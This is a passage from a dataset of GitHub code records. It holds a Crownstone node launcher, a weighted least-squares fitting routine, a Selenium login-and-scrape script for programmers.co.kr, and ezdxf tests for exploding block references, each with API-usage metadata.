"usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 8, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 9, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}]}
+{"seq_id": "33470390842", "text": "#!/bin/python3\n\nfrom CrownstoneYodiwo import CrownstoneNode\n\nfrom pathlib import Path\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--configFile', default='nodeConfig.json', help='configuration file')\nargs = parser.parse_args()\nconfigFile = args.configFile\n\ncFile = Path(configFile)\nif cFile.is_file():\n node = CrownstoneNode()\n node.loadConfig(configFile)\n node.start()\nelse:\n print(\"Error: File \" + configFile + \" does not exist\")\n", "repo_name": "crownstone/yodiwo-crownstone-node", "sub_path": "bin/yodiwo-crownstone.py", "file_name": "yodiwo-crownstone.py", "file_ext": "py", "file_size_in_byte": 488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "call"}, {"api_name": "CrownstoneYodiwo.CrownstoneNode", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "28385475811", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n\nweighted2D.py\nContains functions to perform weighted least squares linear fit when there\nis error in both the x and y directions\n\nReference: B. Reed \"Linear least-squares fits with errors in both\ncoordinates. II: Comments on parameter variances\", Am. J. Phys, 60, 1992\n\n\"\"\"\n\ndef mfunc(m, x_in, y_in):\n # MFUNC - function to be minimized in order to find best slope\n\n import numpy as np\n\n # Separate x and y from their weights\n x = x_in[:,0]\n y = y_in[:,0]\n Wxi = x_in[:,1]\n Wyi = y_in[:,1]\n\n # Calculate weight for each data point\n Wi = Wxi*Wyi/(m**2*Wyi+Wxi) # Eq 8\n\n # Weighted means and deviations from weighted means\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12\n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n # Minimization function (eq 19 from paper)\n g = (m**2*np.sum((Wi**2)*U*V/Wxi) + m*np.sum((Wi**2)*((U**2)/Wyi - \n (V**2)/Wxi)) - np.sum((Wi**2)*U*V/Wyi)) \n g = g**2\n\n return g\n \n\ndef wls2d(x, y, delx, dely):\n \"\"\" \n WLS2D Calculates the weighted least squares fit to a straight line when\n there are errors in both the x and y directions.\n\n Reference: B. Reed \"Linear least-squares fits with errors in both\n coordinates. II: Comments on parameter variances\", Am. J. Phys, 60, 1992\n\n fitparams = wls2d(x, y, delx, dely, flag);\n\n INPUTS\n x vector of independent data points\n y vector of dependent data points\n delx vector of uncertainties/errors in x points\n dely vector of uncertainties/errors in y points\n\n OUTPUT\n fitparams vector of fit parameters\n fitparams[0] best fit slope\n fitparams[1] best fit y intercept\n fitparams[2] uncertainty in slope\n fitparams[3] uncertainty in y-intercept\n\n Note: equation numbers from B. Reed's paper\n \"\"\"\n\n import numpy as np\n from numpy.matlib import repmat\n from scipy.optimize import fmin\n\n N = len(x)\n\n # Calculate weights and weighted means\n Wxi = 1/(delx**2)\n Wyi = 1/(dely**2)\n \n # Force vectors to be column vectors \n x.shape = (N,1)\n y.shape = (N,1)\n Wxi.shape = (N,1)\n Wyi.shape = (N,1)\n\n # Add weights as second columns to x and y\n xWxi = np.append(x, Wxi, axis=1)\n yWyi = np.append(y, Wyi, axis=1)\n\n # Use unweighted linear regression to find a slope initial guess\n m0 = ((N*np.sum(x*y) - np.sum(x)*np.sum(y))/(N*np.sum(x**2) - np.sum(x)**2))\n\n # Find best slope\n m = fmin(func=mfunc, x0=m0, args=(xWxi, yWyi,))\n\n\n # Calculate final weight for each data point\n Wi = Wxi*Wyi/(m**2*Wyi+Wxi) # Eq 8\n Wj = Wi\n\n # Weighted means & deviations from weighted means\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12\n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n # Calculate corresponding y-intercept (equation 13)\n c = ybar - m*xbar # Eq 13\n\n # Sum of weighted residuals\n S = np.sum(Wi*((V-m*U)**2)) # Eq 14\n\n # Use calculated data points\n lam = Wi*(c + m*x - y) # Eq 26\n x = x - lam*m/Wxi # Eq 24\n y = y + lam/Wyi # Eq 25\n xbar = np.sum(Wi*x)/np.sum(Wi) # Eq 11\n ybar = np.sum(Wi*y)/np.sum(Wi) # Eq 12 \n U = x-xbar # Eq 9\n V = y-ybar # Eq 10\n\n\n # Calculate parameter derivatives (Appendix)\n W = np.sum(Wi) # Eq A10\n HH = -2*m/W*np.sum(Wi**2*V/Wxi) # Eq A11\n JJ = -2*m/W*np.sum(Wi**2*U/Wxi) # Eq A12\n AA = 4*m*np.sum(Wi**3*U*V/Wxi**2) - W*HH*JJ/m # Eq A3\n BB = -np.sum(Wi**2*(4*m*Wi/Wxi*(U**2/Wyi - V**2/Wxi) - 2*V*HH/Wxi + \n 2*U*JJ/Wyi)) # Eq A4\n CC = -np.sum(Wi**2/Wyi*(4*m*Wi*U*V/Wxi + V*JJ + U*HH)) # Eq A5\n delta = np.eye(N) # Kroneker Delta\n delmat = delta - repmat(Wj,1,N)/W\n DD = np.dot(delmat,(Wi**2*V/Wxi)) # Eq A6\n EE = 2*np.dot(delmat,(Wi**2*U/Wyi)) # Eq A7\n FF = np.dot(delmat,(Wi**2*V/Wyi)) # Eq A8\n GG = np.dot(delmat,(Wi**2*U/Wxi)) # Eq A9\n A = np.sum(Wi**2*U*V/Wxi) # Eq 19 & 20\n B = np.sum(Wi**2*(U**2/Wyi - V**2/Wxi)) # Eq 19 & 20\n dmdxj = -1*(m**2*DD + m*EE - FF)/(2*m*A + B - AA*m**2 + BB*m - CC) # Eq A1\n dmdyj = -1*(m**2*GG - 2*m*DD - 0.5*EE)/(2*m*A + B - AA*m**2 + BB*m - \n CC); # Eq A2 \n dcdxj = (HH - m*JJ - xbar)*dmdxj - m*Wj/W # Eq A13\n dcdyj = (HH - m*JJ - xbar)*dmdyj + Wj/W # Eq A14\n delm = np.sqrt(S/(N-2)*np.sum(1/Wyi*dmdyj**2 + 1/Wxi*dmdxj**2)) # Eq 21\n delc = np.sqrt(S/(N-2)*np.sum(1/Wyi*dcdyj**2 + 1/Wxi*dcdxj**2)) # Eq 21\n\n fitparams = np.concatenate((m, c))\n fitparams = np.append(fitparams, delm)\n fitparams = np.append(fitparams, delc)\n\n return fitparams\n\n", "repo_name": "tzsummerscales/linfit2Derrors", "sub_path": "weighted2D.py", "file_name": "weighted2D.py", "file_ext": "py", "file_size_in_byte": 4465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sum", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.optimize.fmin", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 146, "usage_type": "call"}]}
+{"seq_id": "31175258628", "text": "from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\ndef progarmmers(id,pw):\n try:\n noopen = webdriver.ChromeOptions()\n noopen.add_argument(\"headless\")\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=noopen)\n \n url = 'https://programmers.co.kr/account/sign_in?referer=https://school.programmers.co.kr/learn/challenges?order=recent&page=1'\n driver.get(url)\n # driver.maximize_window() # 화면을 열고 풀스크린으로 적용\n id_box = driver.find_element(by=By.XPATH,value='//*[@id=\"main-app-account\"]/div/div[2]/div/div[2]/div[1]/div/div[2]/div[2]/input')\n id_box.click()\n id_box.send_keys(id)\n\n pw_box = driver.find_element(by=By.XPATH,value='//*[@id=\"main-app-account\"]/div/div[2]/div/div[2]/div[1]/div/div[2]/div[4]/input')\n pw_box.click()\n pw_box.send_keys(pw)\n\n login_box = driver.find_element(by=By.CSS_SELECTOR,value='#main-app-account > div > div.CqFgmmYa7JLTXOn9RZNl > div > div._i_cm82hE96w0g1ww1rO > div.by9dgl6a9xm729a_4ynt > div > div.G7QZ1shWGosDZ1csHsNt > button')\n login_box.click()\n time.sleep(1)\n\n score = driver.find_element(by=By.XPATH, value='//*[@id=\"edu-service-app-main\"]/div/div[2]/article/div[2]/aside/div[1]/div/ul/li[2]/div[2]')\n return score.text\n except:\n return '아이디/비밀번호가 잘못되었습니다.'", "repo_name": "JunHeeMerong/JunBlog", "sub_path": "main/programmers.py", "file_name": "programmers.py", "file_ext": "py", "file_size_in_byte": 1548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 11, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 16, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 28, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "70791181288", "text": "from typing import cast, Union\n\nimport pytest\nimport ezdxf\nimport math\n\nfrom ezdxf.entities import Ellipse, Point, Arc\nfrom ezdxf.explode import angle_to_param\nfrom ezdxf.math import normalize_angle, Vector\n\n\n@pytest.fixture(scope='module')\ndef doc():\n d = ezdxf.new()\n blk = d.blocks.new('Test1')\n blk.add_line((0, 0), (1, 0))\n blk.add_line((0, 0), (0, 1))\n msp = d.modelspace()\n msp.add_blockref('Test1', (10, 10))\n msp.add_blockref('Test1', (20, 10), dxfattribs={'xscale': 2}) # yscale and zscale\n return d\n\n\n@pytest.fixture(scope='module')\ndef msp(doc):\n return doc.modelspace()\n\n\n@pytest.fixture(scope='module')\ndef entitydb(doc):\n return doc.entitydb\n\n\ndef test_01_virtual_entities(msp):\n blockrefs = msp.query('INSERT')\n blockref = blockrefs[0]\n\n virtual_entities = list(blockref.virtual_entities())\n assert len(virtual_entities) == 2\n\n e = virtual_entities[0]\n # Virtual entities should not be stored in the entity database.\n assert e.dxf.handle is None, 'handle should be None'\n # Virtual entities should not reside in a layout.\n assert e.dxf.owner is None, 'owner should be None'\n # Virtual entities should be assigned to the same document as the block reference.\n assert e.doc is blockref.doc\n\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (1, 0)\n\n e = virtual_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (0, 1)\n\n blockref = blockrefs[1]\n virtual_entities = list(blockref.virtual_entities(non_uniform_scaling=False))\n assert len(virtual_entities) == 0\n virtual_entities = list(blockref.virtual_entities(non_uniform_scaling=True))\n assert len(virtual_entities) == 2\n\n e = virtual_entities[0]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (2, 0), 'should apply xscale 2'\n\n e = virtual_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref.dxf.insert\n assert e.dxf.end == blockref.dxf.insert + (0, 1), 'should apply yscale 1'\n\n\ndef test_02_explode_blockrefs(doc, msp, entitydb):\n blockrefs = msp.query('INSERT')\n blockref = blockrefs.first\n blockref_owner = blockref.dxf.owner\n blockref_insert = blockref.dxf.insert\n\n assert len(msp) == 2 # 2 INSERT\n exploded_entities = blockref.explode()\n assert blockref.is_alive is False, 'Exploded block reference should be destroyed.'\n assert len(exploded_entities) == 2\n assert len(msp) == 3 # 2 INSERT - 1 exploded INSERT + 2 LINE\n\n e = exploded_entities[0]\n # Exploded entities should be stored in the entity database.\n assert e.dxf.handle is not None, 'entity should have a handle'\n assert e.dxf.handle in entitydb\n # Exploded entities should reside in a layout.\n assert e.dxf.owner is not None, 'entity should have an owner'\n assert e.dxf.owner is blockref_owner\n # Exploded entities should be assigned to the same document as the block reference.\n assert e.doc is doc\n\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref_insert\n assert e.dxf.end == blockref_insert + (1, 0)\n\n e = exploded_entities[1]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == blockref_insert\n assert e.dxf.end == blockref_insert + (0, 1)\n\n\ndef test_03_explode_polyline_bulge(doc, msp):\n blk = doc.blocks.new('Test03')\n blk.add_lwpolyline([(0, 0), (3, 0, 0.5), (6, 0), (9, 0)], format='xyb')\n block_ref = msp.add_blockref('Test03', insert=(0, 0), dxfattribs={\n 'yscale': 0.5,\n })\n entities = list(block_ref.virtual_entities(non_uniform_scaling=True))\n assert len(entities) == 3\n\n e = entities[0]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == (0, 0)\n assert e.dxf.end == (3, 0)\n\n e = entities[1]\n e = cast(Ellipse, e)\n assert e.dxftype() == 'ELLIPSE'\n assert e.dxf.center.isclose((4.5, 0.5625, 0))\n assert e.dxf.major_axis.isclose((1.875, 0.0, 0))\n assert e.dxf.ratio == 0.5\n assert math.isclose(e.dxf.start_param, -2.498091544796509 % math.tau)\n assert math.isclose(e.dxf.end_param, -0.6435011087932843 % math.tau)\n assert e.start_point.isclose(Vector(3, 0, 0))\n assert e.end_point.isclose(Vector(6, 0, 0), abs_tol=1e-5)\n\n e = entities[2]\n assert e.dxftype() == 'LINE'\n assert e.dxf.start == (6, 0)\n assert e.dxf.end == (9, 0)\n\n\ndef test_04_explode_blockref_with_attrib(doc, msp, entitydb):\n blockref = msp.add_blockref('Test1', (20, 10)) # with attrib\n blockref.add_attrib(tag='TAG', text='Text', insert=(1.5, 2.6))\n assert len(blockref.attribs) == 1, 'Error in add_attrib()'\n attrib = blockref.attribs[0]\n\n exploded_entities = blockref.explode()\n assert blockref.is_alive is False, 'Exploded block reference should be destroyed.'\n assert attrib.is_alive is False, 'Exploded attribs should be destroyed.'\n assert len(exploded_entities) == 3, '2x LINE and 1x TEXT'\n text = exploded_entities[-1]\n assert text.dxftype() == 'TEXT'\n assert text.dxf.text == 'Text'\n assert text.dxf.insert == (1.5, 2.6), 'ATTRIB already located in WCS'\n\n\ndef test_05_examine_uniform_scaled_ellipse(doc, msp):\n blk = doc.blocks.new('EllipseBlk')\n blk.add_ellipse((0, 0), major_axis=(2, 0), ratio=0.5)\n blkref = msp.add_blockref('EllipseBlk', insert=(2, 2)).scale(2)\n ellipse = list(blkref.virtual_entities())[0]\n assert ellipse.dxftype() == 'ELLIPSE'\n assert ellipse.dxf.center == (2, 2)\n assert ellipse.dxf.major_axis == (4, 0)\n assert ellipse.dxf.ratio == 0.5\n\n\ndef test_06_skipped_entities_callback(doc, msp):\n blk = doc.blocks.new('test_block')\n hatch = blk.add_hatch()\n edge_path = hatch.paths.add_edge_path()\n edge_path.add_arc((0, 0))\n blk.add_line((0, 0), (1, 0))\n blkref = msp.add_blockref('test_block', insert=(0, 0)).place((0, 0), (1, 2, 3))\n skipped_entities = []\n\n def on_entity_skipped(entity, reason):\n skipped_entities.append((entity, reason))\n\n assert not blkref.has_uniform_scaling\n assert hatch.paths.has_critical_elements()\n entities = list(blkref.virtual_entities(non_uniform_scaling=True, skipped_entity_callback=on_entity_skipped))\n\n assert len(entities) == 1\n assert entities[0].dxftype() == 'LINE'\n assert len(skipped_entities) == 1\n assert skipped_entities[0][0].dxftype() == 'HATCH'\n assert skipped_entities[0][1] == 'unsupported non-uniform scaling'\n\n\ndef _get_transformed_curve(scale_factors: Vector, rotation: float, is_arc: bool) -> Union[Ellipse, Arc]:\n doc = ezdxf.new()\n blk = doc.blocks.new('block')\n if is_arc:\n blk.add_arc((0, 0), radius=1, start_angle=0, end_angle=math.degrees(math.pi / 2))\n else:\n blk.add_ellipse((0, 0), major_axis=(1, 0), ratio=1, start_param=0, end_param=math.pi / 2)\n\n assert blk[0].start_point.isclose(Vector(1, 0, 0))\n assert blk[0].end_point.isclose(Vector(0, 1, 0))\n\n blk.add_point((1, 0))\n blk.add_point((0, 1))\n block_ref = doc.modelspace().add_blockref('block', insert=(0, 0), dxfattribs={\n 'xscale': scale_factors.x, 'yscale': scale_factors.y, 'zscale': scale_factors.z,\n 'rotation': math.degrees(rotation)\n })\n entities = list(block_ref.virtual_entities(non_uniform_scaling=True))\n assert len(entities) == 3\n\n if is_arc and block_ref.has_uniform_scaling:\n assert entities[0].dxftype() == 'ARC'\n else:\n assert entities[0].dxftype() == 'ELLIPSE'\n ellipse = cast(Union[Ellipse, Arc], entities[0])\n\n # points should have been transformed the same as the ellipse\n assert entities[1].dxftype() == 'POINT'\n start_point = cast(Point, entities[1])\n assert start_point.dxf.location.isclose(ellipse.start_point)\n assert entities[2].dxftype() == 'POINT'\n end_point = cast(Point, entities[2])\n assert end_point.dxf.location.isclose(ellipse.end_point)\n\n return ellipse\n\n\ndef _check_curve(ellipse: Ellipse, expected_start: Vector, expected_end: Vector, expected_extrusion: Vector):\n assert ellipse.start_point.isclose(expected_start)\n assert ellipse.end_point.isclose(expected_end)\n assert ellipse.dxf.extrusion.isclose(expected_extrusion)\n\n\n# TODO: currently zscale=-1 is failing\n#@pytest.mark.parametrize('zscale,is_arc', [(1, False), (0.5, False), (1, True), (0.5, True), (-1, False), (-1, True)])\n@pytest.mark.parametrize('zscale,is_arc', [(1, False), (0.5, False), (1, True), (0.5, True)])\ndef test_07_rotated_and_reflected_curves(zscale, is_arc):\n scale = Vector(1, 1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(1, -1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(-1, 1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n scale = Vector(-1, -1, zscale)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(1, 0, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, 1, 0), Vector(0, 0, zscale))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-1, 0, 0), Vector(0, 0, zscale))\n\n\n@pytest.mark.parametrize('stretch,is_arc', [(0.5, False), (0.5, True)])\ndef test_08_rotated_and_reflected_and_stretched_curves(stretch, is_arc):\n scale = Vector(1, stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(1, -stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(-1, stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n scale = Vector(-1, -stretch, 1)\n\n ellipse = _get_transformed_curve(scale, 0.0, is_arc)\n _check_curve(ellipse, Vector(-1, 0, 0), Vector(0, -stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, -1, 0), Vector(stretch, 0, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, math.pi, is_arc)\n _check_curve(ellipse, Vector(1, 0, 0), Vector(0, stretch, 0), Vector(0, 0, 1))\n\n ellipse = _get_transformed_curve(scale, 3 * math.pi / 2, is_arc)\n _check_curve(ellipse, Vector(0, 1, 0), Vector(-stretch, 0, 0), Vector(0, 0, 1))\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n", "repo_name": "DatacloudIntl/dc_ezdxf", "sub_path": "tests/test_04_dxf_high_level_structs/test_414_explode_blockrefs.py", "file_name": "test_414_explode_blockrefs.py", "file_ext": "py", "file_size_in_byte": 13798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ezdxf.new", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 122, "usage_type": "call"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 122, "usage_type": "argument"}, {"api_name": "math.isclose", "line_number": 127, "usage_type": "call"}, {"api_name": "math.tau", "line_number": 127, "usage_type": "attribute"}, {"api_name": "math.isclose", "line_number": 128, "usage_type": "call"}, {"api_name": "math.tau", "line_number": 128, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 129, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 130, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.new", "line_number": 189, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 192, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 192, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 194, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 196, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 197, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 203, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 212, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 212, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 212, "usage_type": "name"}, {"api_name": "ezdxf.entities.Arc", "line_number": 212, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 216, "usage_type": "call"}, {"api_name": "ezdxf.entities.Point", "line_number": 216, "usage_type": "argument"}, {"api_name": "typing.cast", "line_number": 219, "usage_type": "call"}, {"api_name": "ezdxf.entities.Point", "line_number": 219, "usage_type": "argument"}, {"api_name": "typing.Union", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Arc", "line_number": 188, "usage_type": "name"}, {"api_name": "ezdxf.entities.Ellipse", "line_number": 225, "usage_type": "name"}, {"api_name": "ezdxf.math.Vector", "line_number": 225, "usage_type": "name"}, {"api_name": "ezdxf.math.Vector", "line_number": 235, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 238, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 240, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 241, 